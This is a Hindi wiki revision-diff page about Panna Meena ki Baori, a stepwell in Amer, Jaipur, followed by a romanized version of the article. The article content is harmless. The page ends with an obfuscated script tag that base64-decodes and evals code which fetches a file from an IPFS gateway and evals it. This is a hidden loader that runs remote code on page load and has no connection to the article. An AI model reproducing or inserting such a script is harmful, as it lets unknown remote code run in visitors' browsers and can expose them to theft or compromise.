Difference between revisions of "पन्ना मीना की बावड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''पन्ना मीना की बावड़ी''' राजस्थान में एक पर्यटन स्थ...' के साथ नया पन्ना बनाया)
 
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''पन्ना मीना की बावड़ी''' [[राजस्थान]] में एक पर्यटन स्थल है जो [[आमेर]], [[जयपुर]] में स्थित है। अत्यंत आकर्षक इस बावड़ी के एक ओर जयगढ़ दुर्ग व दूसरी ओर पहाड़ों की नैसर्गिक सुंदरता है। यह अपनी अद्भुत आकार की सीढ़ियों, अष्टभुजा किनारों और बरामदों के लिए विख्यात है। चाँद बावड़ी तथा हाड़ी रानी की बावड़ी के समान इसमें भी तीन तरफ सीढ़ियाँ है। इसके चारों किनारों पर छोटी-छोटी छतरियां और लघु देवालय इसे मनोहारी रूप प्रदान करते हैं।
+
'''पन्ना मीना की बावड़ी''' [[राजस्थान]] का एक पर्यटन स्थल है, जो [[आमेर]], [[जयपुर]] में स्थित है। अत्यंत आकर्षक इस [[बावड़ी]] के एक ओर [[जयगढ़ क़िला जयपुर|जयगढ़ दुर्ग]] व दूसरी ओर पहाड़ों की नैसर्गिक सुंदरता है।
  
 +
*पन्ना की बावड़ी अपनी अद्भुत आकार की सीढ़ियों, अष्टभुजा किनारों और बरामदों के लिए विख्यात है।
 +
*[[आभानेरी]] की '[[चाँद बावड़ी]]' तथा [[हाड़ी रानी]] की [[बावड़ी]] के समान ही इसमें भी तीन तरफ़ सीढ़ियाँ हैं।
 +
*इसके चारों किनारों पर छोटी-छोटी छतरियां और लघु देवालय इसे मनोहारी रूप प्रदान करते हैं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]]
+
[[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]][[Category:जयपुर]][[Category:जयपुर के पर्यटन स्थल]][[Category:पर्यटन कोश]][[Category:राजस्थान के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:ऐतिहासिक स्थल]]
[[Category:राजस्थान के पर्यटन स्थल]]
 
[[Category:जयपुर]]
 
[[Category:जयपुर के पर्यटन स्थल]][[Category:पर्यटन कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 07:59, 5 October 2014

panna mina ki bav di rajasthan ka ek paryatan sthal hai, jo amer, jayapur mean sthit hai. atyant akarshak is bav di ke ek or jayagadh durg v doosari or paha doan ki naisargik suandarata hai.

  • panna ki bav di apani adbhut akar ki sidhiyoan, ashtabhuja kinaroan aur baramadoan ke lie vikhyat hai.
  • abhaneri ki 'chaand bav di' tatha ha di rani ki bav di ke saman hi isamean bhi tin taraf sidhiyaan haian.
  • isake charoan kinaroan par chhoti-chhoti chhatariyaan aur laghu devalay ise manohari roop pradan karate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>